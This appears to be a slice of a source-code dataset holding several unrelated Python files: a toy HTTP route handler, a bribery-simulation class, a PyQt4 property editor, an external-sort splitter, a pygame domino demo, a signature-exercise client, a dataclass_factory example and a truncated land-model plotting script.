request.form()\n user = User.new(form)\n if user.validate_register():\n result = '注册成功!'\n user.save()\n else:\n result = '用户名或者密码小于等于2位'\n else:\n result = ''\n body = template('register.html')\n body = 
body.replace('{{result}}', result)\n    r = headers + '\\r\\n' + body\n    return r.encode(encoding='utf-8')\n\n\ndef route_login(request):\n    header_dict = {\n        'Content-Type': 'text/html'\n    }\n    if request.method == 'POST':\n        form = request.form()\n        user = User.new(form)\n        if user.validate_login():\n            result = '登陆成功!'\n            # set the session and cookie\n            session_id = random_str()\n            session[session_id] = user.username\n            header_dict['Set-Cookie'] = 'user={}'.format(session_id)\n\n        else:\n            result = '用户名错误或密码错误!'\n    else:\n        result = ''\n    username = current_user(request)\n    body = template('login.html')\n    body = body.replace('{{username}}', username)\n    body = body.replace('{{result}}', result)\n    headers = response_with_header(header_dict)\n    r = headers + '\\r\\n' + body\n    return r.encode(encoding='utf-8')\n\n\nmessage_list = []\nsession = {}\n\n\ndef route_messages(request):\n    header_dict = {\n        'Content-Type': 'text/html'\n    }\n    headers = response_with_header(header_dict)\n    if request.method == 'POST':\n        form = request.form()\n        message = Message.new(form)\n        message.save()\n        message_list.append(message)\n    msg = '\\n'.join([str(m) for m in message_list])\n    body = template('html_basic.html')\n    log('message', msg)\n    body = body.replace('{{messages}}', msg)\n    log('替代后:', body)\n    r = headers + '\\r\\n' + body\n    return r.encode(encoding='utf-8')\n\n\ndef route_profile(request):\n    header_dict = {\n        'Content-Type': 'text/html'\n    }\n    headers = response_with_header(header_dict)\n    body = template('profile.html')\n    username = current_user(request)\n    if username == '【游客】':\n        header_dict['Location'] = 'http://localhost:3000/login'\n        headers = response_with_header(header_dict, 302)\n    else:\n        user = User.find_by(username=username)\n        body = body.replace('{{username}}', user.username)\n        body = body.replace('{{id}}', str(user.id))\n        body = body.replace('{{note}}', user.note)\n\n    r = headers + '\\r\\n' + body\n    return r.encode(encoding='utf-8')\n\n\nroute_dict = {\n    '/': route_index,\n    '/register': route_register,\n    '/login': route_login,\n    '/messages': route_messages,\n    '/profile': route_profile,\n}\n","sub_path":"web004/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"584547647","text":"from typing import Dict, Any, Tuple, List\n\nimport numpy as np\n\nfrom BribeNet.bribery.temporal.action.briberyAction import BriberyAction\nfrom BribeNet.bribery.temporal.briber import GraphNotSubclassOfTemporalRatingGraphException\nfrom BribeNet.graph.temporal.action.actionType import ActionType\nfrom BribeNet.helpers.bribeNetException import BribeNetException\n\n\nclass CustomerActionExecutedMultipleTimesException(BribeNetException):\n    pass\n\n\nclass CustomerActionTimeNotCorrectException(BribeNetException):\n    pass\n\n\nclass CustomerAction(object):\n\n    def __init__(self, graph):\n        from BribeNet.graph.temporal.ratingGraph import TemporalRatingGraph  # local import to remove cyclic dependency\n        if not issubclass(graph.__class__, TemporalRatingGraph):\n            raise GraphNotSubclassOfTemporalRatingGraphException(f\"{graph.__class__.__name__} is not a subclass of \"\n                                                                 \"TemporalRatingGraph\")\n        self.graph = graph\n        self.actions: Dict[int, Tuple[ActionType, Any]] = {c: (ActionType.NONE, None)\n                                                           for c in self.graph.get_customers()}\n        self.__time_step = self.graph.get_time_step()\n        self.__performed = False\n\n    @classmethod\n    def empty_action(cls, graph):\n        return cls(graph)\n\n    def get_time_step(self):\n        return self.__time_step\n\n    def 
get_performed(self):\n return self.__performed\n\n def get_action_type(self, node_id: int):\n return self.actions[node_id][0]\n\n def set_bribed(self, node_id: int, briber_ids: List[int]):\n self.actions[node_id] = (ActionType.BRIBED, briber_ids)\n\n def set_none(self, node_id: int):\n self.actions[node_id] = (ActionType.NONE, 0)\n\n def set_select(self, node_id: int, briber_id):\n self.actions[node_id] = (ActionType.SELECT, briber_id)\n\n def set_bribed_from_bribery_action(self, bribery_action: BriberyAction):\n for c in self.actions:\n bribed, bribers = bribery_action.is_bribed(c)\n if bribed:\n self.set_bribed(c, bribers)\n\n # noinspection PyProtectedMember\n def perform_action(self, pay: float):\n \"\"\"\n Perform the described action on the graph\n :param pay: the amount to increase a selected briber's utility\n \"\"\"\n if not self.__performed:\n if self.__time_step == self.graph.get_time_step():\n for c in self.actions:\n if self.actions[c][0] == ActionType.SELECT:\n selected = self.actions[c][1]\n if np.isnan(self.graph._votes[c][selected]): # no previous vote or bribe\n self.graph._votes[c][selected] = self.graph._truths[c][selected]\n self.graph._bribers[selected].add_resources(pay)\n self.__performed = True\n else:\n message = f\"The time step of the TemporalRatingGraph ({self.graph.get_time_step()}) is not equal to \" \\\n f\"the intended execution time ({self.__time_step})\"\n raise CustomerActionTimeNotCorrectException(message)\n else:\n raise CustomerActionExecutedMultipleTimesException()\n","sub_path":"src/BribeNet/graph/temporal/action/customerAction.py","file_name":"customerAction.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576383851","text":"#\n# Project: MXCuBE\n# https://github.com/mxcube.\n#\n# This file is part of MXCuBE software.\n#\n# MXCuBE is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# MXCuBE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with MXCuBE. If not, see .\n\nimport os\nimport types\nimport weakref\nimport logging\n\nfrom PyQt4 import QtCore\nfrom PyQt4 import QtGui\n\nimport PropertyBag\nfrom BlissFramework import Qt4_Icons\n\ntry:\n from PyQt4.QtCore import QStringList\nexcept:\n QtCore.QStringList = list\n\n\nclass Qt4_ConfigurationTable(QtGui.QTableWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent):\n \"\"\"\n Descript. :\n \"\"\"\n QtGui.QTableWidget.__init__(self, parent)\n\n self.setObjectName(\"configurationTable\")\n self.setFrameShape(QtGui.QFrame.StyledPanel)\n self.setFrameShadow(QtGui.QFrame.Sunken)\n self.setContentsMargins(0, 3, 0, 3)\n self.setColumnCount(3)\n self.setSelectionMode(QtGui.QTableWidget.NoSelection)\n\n self.setHorizontalHeaderLabels([self.trUtf8('Properties'), \n self.trUtf8('Values'), \n self.trUtf8('')])\n \n self.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)\n self.propertyBag = None\n\n self.cellChanged.connect(self.OnCellChanged)\n \n def clear(self):\n \"\"\"\n Descript. 
:\n \"\"\"\n for i in range(self.rowCount()):\n self.removeRow(i)\n self.setRowCount(0)\n self.propertyBag = None\n\n \n def setPropertyBag(self, propertyBag, showHidden=False):\n \"\"\"\n Descript. :\n \"\"\"\n self.clear() \n if self.propertyBag is not None:\n for prop in self.propertyBag:\n prop._editor = None\n\n self.propertyBag = propertyBag\n\n if self.propertyBag is not None:\n self.setRowCount(len(self.propertyBag))\n \n i = 0\n self.setRowCount(len(self.propertyBag))\n for prop in self.propertyBag:\n prop._editor = weakref.ref(self)\n \n if not showHidden and prop.hidden:\n continue\n\n tempTableItem = QtGui.QTableWidgetItem(prop.getName())\n tempTableItem.setFlags(QtCore.Qt.ItemIsEnabled)\n self.blockSignals(True) \n self.setItem(i, 0, tempTableItem)\n self.setWidgetFromProperty(i, prop)\n self.blockSignals(False)\n \n validationPanel = ValidationTableItem(self)\n self.setCellWidget(i, 2, validationPanel)\n validationPanel.OK.clicked.connect(self.OnValidateClick)\n validationPanel.Cancel.clicked.connect(self.OnInvalidateClick)\n validationPanel.Reset.clicked.connect(self.OnResetClick)\n i += 1\n #self.setRowCount(i)\n self.resizeColumnsToContents() \n \n def setWidgetFromProperty(self, row, prop):\n \"\"\"\n Descript. :\n \"\"\"\n if prop.getType() == 'boolean':\n newPropertyItem = QtGui.QTableWidgetItem(QtCore.QString(\"\"))\n self.setItem(row, 1, newPropertyItem)\n if prop.getUserValue():\n self.item(row, 1).setCheckState(QtCore.Qt.Checked)\n else:\n self.item(row, 1).setCheckState(QtCore.Qt.Unchecked)\n elif prop.getType() == 'combo':\n choicesList = QtCore.QStringList()\n choices = prop.getChoices()\n for choice in choices:\n choicesList.append(choice)\n newPropertyItem = ComboBoxTableItem(self, row, 1, choicesList)\n newPropertyItem.setCurrentIndex(newPropertyItem.findText(prop.getUserValue()))\n self.setCellWidget(row, 1, newPropertyItem)\n elif prop.getType() == 'file':\n newPropertyItem = FileTableItem(self, row, 1, prop.getUserValue(), prop.getFilter())\n self.setCellWidget(row, 1, newPropertyItem)\n elif prop.getType() == 'color':\n newPropertyItem = ColorTableItem(self, row, 1, prop.getUserValue())\n self.setCellWidget(row, 1, newPropertyItem)\n else: \n if prop.getUserValue() is None:\n tempTableItem = QtGui.QTableWidgetItem(\"\")\n else:\n tempTableItem = QtGui.QTableWidgetItem(str(prop.getUserValue())) \n self.setItem(row, 1, tempTableItem)\n\n def OnCellChanged(self, row, col):\n \"\"\"\n Descript. 
:\n \"\"\"\n col += 1\n\n item_property = self.propertyBag.getProperty(str(self.item(row, 0).text()))\n oldValue = item_property.getUserValue()\n\n if item_property.getType() == 'boolean':\n item_property.setValue(self.item(row, 1).checkState())\n elif item_property.getType() == 'combo':\n item_property.setValue(self.cellWidget(row, 1).currentText())\n elif item_property.getType() == 'file':\n item_property.setValue(self.cellWidget(row, 1).get_filename())\n elif item_property.getType() == 'color':\n item_property.setValue(self.cellWidget(row, 1).color)\n else: \n try:\n item_property.setValue(str(self.item(row, 1).text()))\n except:\n logging.getLogger().error('Cannot assign value %s to property %s' % \\\n (str(self.item(row, 1).text()), item_property.getName()))\n\n if item_property.getUserValue() is None:\n self.item(row, 1).setText('')\n else:\n self.item(row, 1).setText(str(item_property.getUserValue()))\n\n if not oldValue == item_property.getUserValue():\n self.emit(QtCore.SIGNAL('propertyChanged'), item_property.getName(), \n oldValue, item_property.getUserValue())\n\n def OnValidateClick(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.endEdit(self.currentRow(), 1, 1, 0) #current row, col 1, accept = 1, replace = 0\n self.activateNextCell()\n \n def OnInvalidateClick(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.endEdit(self.currentRow(), 1, 0, 0) #current row, col 1, accept = 0, replace = 0\n\n def OnResetClick(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.endEdit(self.currentRow(), 1, 0, 0)\n\n property = self.propertyBag.getProperty(str(self.text(self.currentRow(), 0)))\n\n defaultValue = property.getDefaultValue()\n if not defaultValue == None:\n property.setValue(defaultValue)\n \n self.setWidgetFromProperty(self.currentRow(), property)\n\n def beginEdit(self, row, col, replace):\n \"\"\"\n Descript. :\n \"\"\"\n if col == 1 and row >= 0:\n self.item(row, 2).setEnabled(1)\n \n return QTable.beginEdit(self, row, col, replace)\n\n def endEdit(self, row, col, accept, replace):\n \"\"\"\n Descript. :\n \"\"\"\n if col == 1 and row >= 0:\n self.item(row, 2).setEnabled(0)\n\n if accept:\n prop = self.propertyBag.getProperty(str(self.text(row, 0)))\n\n oldValue = prop.getUserValue()\n \n if prop.getType() == 'boolean':\n prop.setValue(self.item(row, 1).isChecked())\n elif prop.getType() == 'combo':\n prop.setValue(self.item(row, 1).currentText())\n else: \n try:\n prop.setValue(str(self.text(row, 1)))\n except:\n logging.getLogger().error('Cannot assign value to property')\n\n if prop.getUserValue() is None:\n self.setText(row, 1, '')\n else:\n self.setText(row, 1, str(prop.getUserValue()))\n\n if not oldValue == prop.getUserValue():\n self.emit(QtCore.SIGNAL('propertyChanged'), (property.getName(), oldValue, property.getUserValue(), ))\n\n return QTable.endEdit(self, row, col, accept, replace)\n\n\nclass ValidationTableItem(QtGui.QWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Descript. 
: parent (QTreeWidget) : Item's QTreeWidget parent.\n \"\"\"\n\n QtGui.QWidget.__init__(self, parent)\n \n self.OK = QtGui.QToolButton(parent)\n self.OK.setAutoRaise(True)\n self.OK.setIcon(QtGui.QIcon(Qt4_Icons.load('button_ok_small'))) #QPixmap(Icons.tinyOK)))\n self.Cancel = QtGui.QToolButton(parent)\n self.Cancel.setAutoRaise(True)\n self.Cancel.setIcon(QtGui.QIcon(Qt4_Icons.load('button_cancel_small'))) #QPixmap(Icons.tinyCancel)))\n self.Reset = QtGui.QToolButton(parent)\n self.Reset.setIcon(QtGui.QIcon(Qt4_Icons.load('button_default_small'))) #QPixmap(Icons.defaultXPM)))\n self.Reset.setAutoRaise(True)\n self.setEnabled(False)\n\n main_layout = QtGui.QHBoxLayout()\n main_layout.addWidget(self.OK)\n main_layout.addWidget(self.Cancel)\n main_layout.addWidget(self.Reset)\n main_layout.setSpacing(0)\n main_layout.setContentsMargins(0,0,0,0)\n self.setLayout(main_layout)\n\n def setEnabled(self, enabled):\n \"\"\"\n Descript. :\n \"\"\"\n if enabled:\n self.Reset.setEnabled(True)\n self.OK.setEnabled(True)\n self.Cancel.setEnabled(True)\n else:\n self.Reset.setEnabled(False)\n self.OK.setEnabled(False)\n self.Cancel.setEnabled(False)\n\nclass ComboBoxTableItem(QtGui.QComboBox):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent, row, col, items_list = None):\n \"\"\" \n Descript. :\n \"\"\"\n QtGui.QComboBox.__init__(self)\n if items_list is not None:\n self.addItems(items_list) \n self.col = col\n self.row = row \n self.parent = parent\n QtCore.QObject.connect(self, QtCore.SIGNAL('currentIndexChanged(int)'), self.current_index_changed)\n\n def current_index_changed(self, index): \n \"\"\"\n Descript. :\n \"\"\"\n self.parent.emit(QtCore.SIGNAL('cellChanged(int, int)'), self.row, self.col) \n\nclass FileTableItem(QtGui.QWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent, row, col, filename, file_filter):\n \"\"\"\n Descript. :\n \"\"\"\n QtGui.QWidget.__init__(self)\n\n self.file_filter = file_filter\n self.parent = parent\n self.col = col\n self.row = row\n\n self.cmdBrowse = QtGui.QPushButton('Browse', self.parent.viewport())\n\n main_layout = QtGui.QHBoxLayout()\n main_layout.addWidget(self.cmdBrowse)\n main_layout.setSpacing(0)\n main_layout.setContentsMargins(0,0,0,0)\n self.setLayout(main_layout) \n\n QtCore.QObject.connect(self.cmdBrowse, QtCore.SIGNAL('clicked()'), self.browse_clicked) \n self.set_filename(filename)\n\n def set_filename(self, filename):\n \"\"\"\n Descript. :\n \"\"\"\n self.filename = str(filename)\n\n if self.cmdBrowse is not None:\n self.cmdBrowse.setToolTip(self.filename)\n\n self.parent.emit(QtCore.SIGNAL('cellChanged(int, int)'), self.row, self.col)\n\n def get_filename(self):\n \"\"\"\n Descript. :\n \"\"\"\n return self.filename \n \n def browse_clicked(self):\n \"\"\"\n Descript. :\n \"\"\"\n new_filename = QtGui.QFileDialog.getOpenFileName(\n self, os.path.dirname(self.filename) or os.getcwd(), \n self.file_filter, '', 'Select a file')\n \n if len(new_filename) > 0:\n self.set_filename(new_filename)\n\n \nclass ColorTableItem(QtGui.QWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent, row, col, color):\n \"\"\"\n Descript. 
:\n        \"\"\"\n        QtGui.QWidget.__init__(self, parent)\n\n        self.col = col\n        self.row = row\n        self.parent = parent\n\n        self.cmdChangeColor = QtGui.QPushButton('Color...', parent)\n        self.cmdResetColor = QtGui.QPushButton('reset', parent)\n\n        main_layout = QtGui.QHBoxLayout()\n        main_layout.addWidget(self.cmdChangeColor)\n        main_layout.addWidget(self.cmdResetColor)\n        main_layout.setSpacing(0)\n        main_layout.setContentsMargins(0,0,0,0)\n        self.setLayout(main_layout)\n\n        self.cmdChangeColor.clicked.connect(self.cmdChangeColorClicked)\n        self.cmdResetColor.clicked.connect(self.cmdResetColorClicked)\n        self.setColor(color)\n\n        #main_layout = QtGui.QVBoxLayout()\n        #main_layout.addWidget(hbox) \n        #self.setLayout(main_layout) \n\n    def setColor(self, color):\n        \"\"\"\n        Descript. :\n        \"\"\"\n        try:\n            rgb = color.rgb()\n        except:\n            try:\n                self.qtcolor = QtGui.QColor(color)\n            except:\n                self.qtcolor = QtGui.QColor(QtCore.Qt.green)\n                self.color = self.qtcolor.rgb()\n            else:\n                self.color = self.qtcolor.rgb()\n        else:\n            self.qtcolor=color\n            self.color=rgb\n\n        if self.cmdChangeColor is not None: \n            palette = self.cmdChangeColor.palette()\n            palette.setColor(QtGui.QPalette.Button, self.qtcolor)\n            #palette.setColor(QtGui.QPalette.Inactive, self.qtcolor)\n\n            self.cmdChangeColor.setPalette(palette)\n            # setStyleSheet(\"background-color: red\")\n            #self.cmdChangeColor.setPaletteBackgroundColor(self.qtcolor)\n\n        self.parent.emit(QtCore.SIGNAL('cellChanged(int, int)'), self.row, self.col)\n\n    def cmdChangeColorClicked(self):\n        \"\"\"\n        Descript. :\n        \"\"\"\n        newColor = QtGui.QColorDialog.getColor(self.qtcolor or QtGui.QColor(\"white\"), None, 'Select a color')\n        if newColor.isValid():\n            self.setColor(newColor)\n\n    def cmdResetColorClicked(self):\n        \"\"\"\n        Descript. :\n        \"\"\"\n        self.setColor(None)\n    \n\nclass Dialog(QtGui.QDialog):\n    \"\"\"\n    Descript. :\n    \"\"\"\n\n    def __init__(self, propertyBag):\n        \"\"\"\n        Descript. 
:\n \"\"\"\n QtGui.QDialog.__init__(self, None, None, Qt.WDestructiveClose)\n\n self.setCaption(\"Configuration Editor\")\n self.propertiesTable = ConfigurationTable(self)\n self.propertiesTable.setPropertyBag(propertyBag)\n cmdClose = QPushButton('Close', self)\n \n self.connect(self.propertiesTable, PYSIGNAL('propertyChanged'), PYSIGNAL('propertyChanged'))\n self.connect(cmdClose, SIGNAL('clicked()'), self.close)\n\n QVBoxLayout(self, 0, 0)\n self.layout().setResizeMode(QLayout.FreeResize)\n self.layout().addWidget(self.propertiesTable)\n self.layout().addWidget(cmdClose)\n \n self.setFixedHeight(500)\n","sub_path":"Utils/Qt4_PropertyEditor.py","file_name":"Qt4_PropertyEditor.py","file_ext":"py","file_size_in_byte":15558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5642644","text":"import sys\nimport os\nimport logging\n\nfrom errors import MemoryStarvationError\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(message)s'\n)\n\n\nclass Sorter:\n\n def __init__(self, max_size, input_file, output_file):\n self.max_size = max_size\n self.input_file = input_file\n self.output_file = output_file\n self.current_directory = os.getcwd()\n\n @staticmethod\n def get_file_location(self, file_name):\n file_location = self.current_directory + '\\\\' + file_name\n logging.debug('{} file is being processed'.format(file_location))\n return file_location\n\n # def create_temporary_folder(self):\n # path = self.current_directory + '\\\\' + 'temporary_folder'\n # logging.debug('Create temporary folder {}'.format(path))\n # os.mkdir(path)\n\n def shatter_file(self):\n input_file_location = self.get_file_location(self, self.input_file)\n with open(input_file_location) as input_file:\n trapped_memory_sum = 0\n temp_text_block = ''\n temp_block_number = 0\n for line in input_file:\n logging.debug('Handling line - {}'.format(line))\n trapped_memory_line = sys.getsizeof(line)\n\n if trapped_memory_line > self.max_size:\n raise MemoryStarvationError()\n\n if trapped_memory_sum + trapped_memory_line < self.max_size:\n temp_text_block += line\n continue\n\n else:\n temp_block_number += 1\n temp_block_name = 'temporary_file_' + str(temp_block_number)\n with open(temp_block_name, 'w') as t :\n t.write(temp_text_block)\n temp_text_block = ''\n continue\n\n temp_block_name = 'temporary_file_' + str(temp_block_number)\n with open(temp_block_name, 'w') as t:\n t.write(temp_text_block)\n\n\n\n","sub_path":"external_sort/sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541798564","text":"import pygame, sys\nfrom pygame.locals import *\nfrom collections import Counter\n\nclass Boton(pygame.sprite.Sprite):\n\tdef __init__(self, imagen, imagenselected, x = 100, y= 100):\n\t\tself.imagen_normal = imagen\n\t\tself.imagen_seleccionada = imagenselected\n\t\tself.imagen_actual = self.imagen_normal\n\t\tself.rect = self.imagen_actual.get_rect()\n\t\tself.rect.left, self.rect.top = (x,y)\n\n\tdef update(self, pantalla, cursor):\n\t\tif cursor.colliderect(self.rect):\n\t\t\tself.imagen_actual = self.imagen_seleccionada\n\t\telse: \n\t\t\tself.imagen_actual = self.imagen_normal\n\t\tpantalla.blit(self.imagen_actual, self.rect)\n\nclass Cursor(pygame.Rect):\n\tdef __init__(self):\n\t\tpygame.Rect.__init__(self, 0, 0, 1, 1)\n\tdef update(self):\n\t\tself.left, self.top = pygame.mouse.get_pos()\n\n\ndef 
iniciar_domino():\n\tpygame.init()\n\n\tventana = pygame.display.set_mode((600,400))\n\tpygame.display.set_caption('Domino')\n\n\t#Tablero Domino\n\tFondo = pygame.transform.scale(pygame.image.load(\"images/fondomadera.jpg\"), [600, 400]).convert_alpha()\n\tventana.blit(Fondo,(0,0))\n\treloj = pygame.time.Clock()\n\t \n\t#fuente = pygame.font.Font(None, 30)\n\t#victoria = fuente.render(\"Juego Terminado\", 0, (255, 255, 255))\n\t#empate = fuente.render(\"Empate\", 0, (255, 255, 255))\n\n\t#Musica\n\tponerficha = pygame.mixer.Sound(\"sounds/colocar.wav\")\n\tponerrror = pygame.mixer.Sound(\"sounds/screem.wav\")\n\n\n\t#Cursor\n\tcursor = Cursor()\n\t#Botones\n\tfichadomino = pygame.transform.scale(pygame.image.load(\"images/0-0.png\"), [100, 40])\n\tfichadominoseleccionada = pygame.transform.scale(pygame.image.load(\"images/S-S.png\"), [100, 40])\n\n\tbotonFICHA= Boton(fichadomino, fichadominoseleccionada, 10, 75)\n\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif cursor.colliderect(botonFICHA.rect):\n\t\t\t\tponerficha.play()\n\t\t\t\tprint('Hola')\n\t\t\tif event.type == QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\treloj.tick(20)\n\t\tcursor.update()\n\t\tbotonFICHA.update(ventana, cursor)\n\t\tpygame.display.update()\niniciar_domino()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"108487913","text":"import os\nimport sys\nimport os.path\nsys.path.append(os.path.join(os.getcwd(), '..',))\n\nimport client as clt\nfrom tools import *\nimport hashlib\nimport random\nimport base64\n\nID_SIGNATURE = \"/id-based-signature\"\nKEY_DIST_CENTER = \"/KDC\"\nP_KEY = \"/PK\"\nKEYGEN = \"/keygen\"\n\nKDC_GET_PK_URL = ID_SIGNATURE + KEY_DIST_CENTER + P_KEY\nKDC_GET_SK_URL = ID_SIGNATURE + KEY_DIST_CENTER + KEYGEN + NAME\nKDC_CHCK_URL = ID_SIGNATURE + \"/check/\" + NAME\n\nN = \"n\"\nE = \"e\"\nS = \"s\"\nT = \"t\"\nM = \"m\"\n\nSECRET_KEY = \"secret-key\"\n\ndef get_kdc_pub_key():\n srv = clt.Server(BASE_URL)\n try:\n param = srv.query(KDC_GET_PK_URL)\n return param[N], param[E]\n except clt.ServerError as err:\n print_serverError_exit(err)\n\ndef get_secret_key():\n srv = clt.Server(BASE_URL)\n try:\n return srv.query(KDC_GET_SK_URL)[SECRET_KEY]\n except clt.ServerError as err:\n print_serverError_exit(err)\n\ndef sign(s_key, n, e, message=\"yoloswag\"):\n msg_byte = message.encode()\n r = random.randint(1, n-1) \n t = pow(r, e, n)\n sha256 = hashlib.sha256()\n t_hex = \"{0:0512x}\".format(t)\n t_bytes = base64.b16decode(t_hex.encode(), casefold=True)\n m_t = msg_byte + t_bytes\n sha256.update(m_t)\n s = s_key * pow(r, int(sha256.hexdigest(), base=16), n) % n\n return {S:s, T:t, M: message} \n\nif __name__ == \"__main__\":\n n, e = get_kdc_pub_key()\n s_key = get_secret_key()\n r = random.randint(1, n -1)\n\n srv = clt.Server(BASE_URL)\n print(srv.query(KDC_CHCK_URL, sign(s_key, n, e)))\n","sub_path":"id-based-signature/id-based-signature.py","file_name":"id-based-signature.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320298051","text":"from dataclasses import dataclass\n\nimport dataclass_factory\nfrom dataclass_factory import Schema\n\n\n@dataclass\nclass Book:\n title: str\n price: int\n author: str\n\n\ndata = {\n \"title\": \"Fahrenheit 451\",\n \"price\": 100,\n \"author\": [\"Ray Bradbury\"]\n}\n\nbook_schema = Schema(\n 
name_mapping={\n        \"author\": (\"author\", 0)\n    }\n)\nfactory = dataclass_factory.Factory(schemas={Book: book_schema})\n\n# Book(title=\"Fahrenheit 451\", price=100, author=\"Ray Bradbury\")\nbook: Book = factory.load(data, Book)\nserialized = factory.dump(book)\nassert serialized == data\n","sub_path":"docs/examples/flatten_list.py","file_name":"flatten_list.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"88561576","text":"#!/usr/bin/env python\n\n\"\"\"\nPlot visual benchmark (average seasonal cycle) of old vs new model runs.\n\nThat's all folks.\n\"\"\"\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (18.10.2017)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport sys\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.ticker import FixedLocator\nimport datetime\nimport os\nimport glob\nfrom optparse import OptionParser\n\ndef main(fname1, plot_fname=None, fpath=None):\n\n    df1 = read_cable_file(fname1, type=\"CABLE\")\n    #plt.plot(df1.plc)\n    #plt.show()\n    #sys.exit()\n    df1 = resample_timestep(df1, type=\"CABLE\")\n    #df1 = df1[(df1.index.hour >= 12) & (df1.index.hour < 13) &\n    #          (df1.index.minute < 30)].copy()\n\n    fig = plt.figure(figsize=(9,6))\n    fig.subplots_adjust(hspace=0.1)\n    fig.subplots_adjust(wspace=0.2)\n    plt.rcParams['text.usetex'] = False\n    plt.rcParams['font.family'] = \"sans-serif\"\n    plt.rcParams['font.sans-serif'] = \"Helvetica\"\n    plt.rcParams['axes.labelsize'] = 12\n    plt.rcParams['font.size'] = 12\n    plt.rcParams['legend.fontsize'] = 12\n    plt.rcParams['xtick.labelsize'] = 12\n    plt.rcParams['ytick.labelsize'] = 12\n\n\n    colours = plt.cm.Set2(np.linspace(0, 1, 7))\n\n    ax1 = fig.add_subplot(1,1,1)\n\n\n    axes = [ax1]\n\n    vars = [\"plc\"]\n    for a, v in zip(axes, vars):\n\n        #a.plot(df1[v].index.to_pydatetime(), df1[v].rolling(window=7).mean(), c=colours[2],\n        #       lw=1.5, ls=\"-\", label=\"Hydraulics\")\n\n        a.plot(df1[v].index.to_pydatetime(), df1[v], c=colours[2],\n               lw=1.5, ls=\"-\")\n\n    #x.bar(df_met.index, df_met[\"Rainf\"], alpha=0.3, color=\"black\")\n    #ax1.set_ylim(0, 0.2)\n\n    labels = [\"PLC (%)\"]\n    for a, l in zip(axes, labels):\n        a.set_ylabel(l, fontsize=12)\n\n    #for x, l in zip(axes2, labels):\n    #    x.set_ylabel(\"Rainfall (mm d$^{-1}$)\", fontsize=12)\n\n\n    #plt.setp(ax1.get_xticklabels(), visible=False)\n    #ax1.legend(numpoints=1, loc=\"best\")\n\n\n    #for a in axes:\n        #a.set_xlim([datetime.date(2002,10,1), datetime.date(2003, 4, 1)])\n    #    a.set_xlim([datetime.date(2002,12,1), datetime.date(2003, 5, 1)])\n        #a.set_xlim([datetime.date(2006,11,1), datetime.date(2007, 4, 1)])\n        #a.set_xlim([datetime.date(2012,7,1), datetime.date(2013, 8, 1)])\n        #a.set_xlim([datetime.date(2006,11,1), datetime.date(2007, 4, 1)])\n\n    if fpath is None:\n        fpath = \"./\"\n    ofname = os.path.join(fpath, plot_fname)\n\n    if plot_fname is None:\n        plt.show()\n    else:\n        #fig.autofmt_xdate()\n        fig.savefig(plot_fname, bbox_inches='tight', pad_inches=0.1)\n\n\ndef read_cable_file(fname, type=None):\n\n    if type == \"CABLE\":\n        vars_to_keep = ['plc']\n    elif type == \"MET\":\n        vars_to_keep = ['Rainf']\n\n    ds = xr.open_dataset(fname, decode_times=False)\n\n    time_jump = int(ds.time[1].values) - int(ds.time[0].values)\n    if time_jump == 3600:\n        freq = \"H\"\n    elif time_jump == 1800:\n        freq = \"30M\"\n    else:\n        raise ValueError(\"Time problem\")\n\n    units, reference_date = ds.time.attrs['units'].split('since')\n    df = 
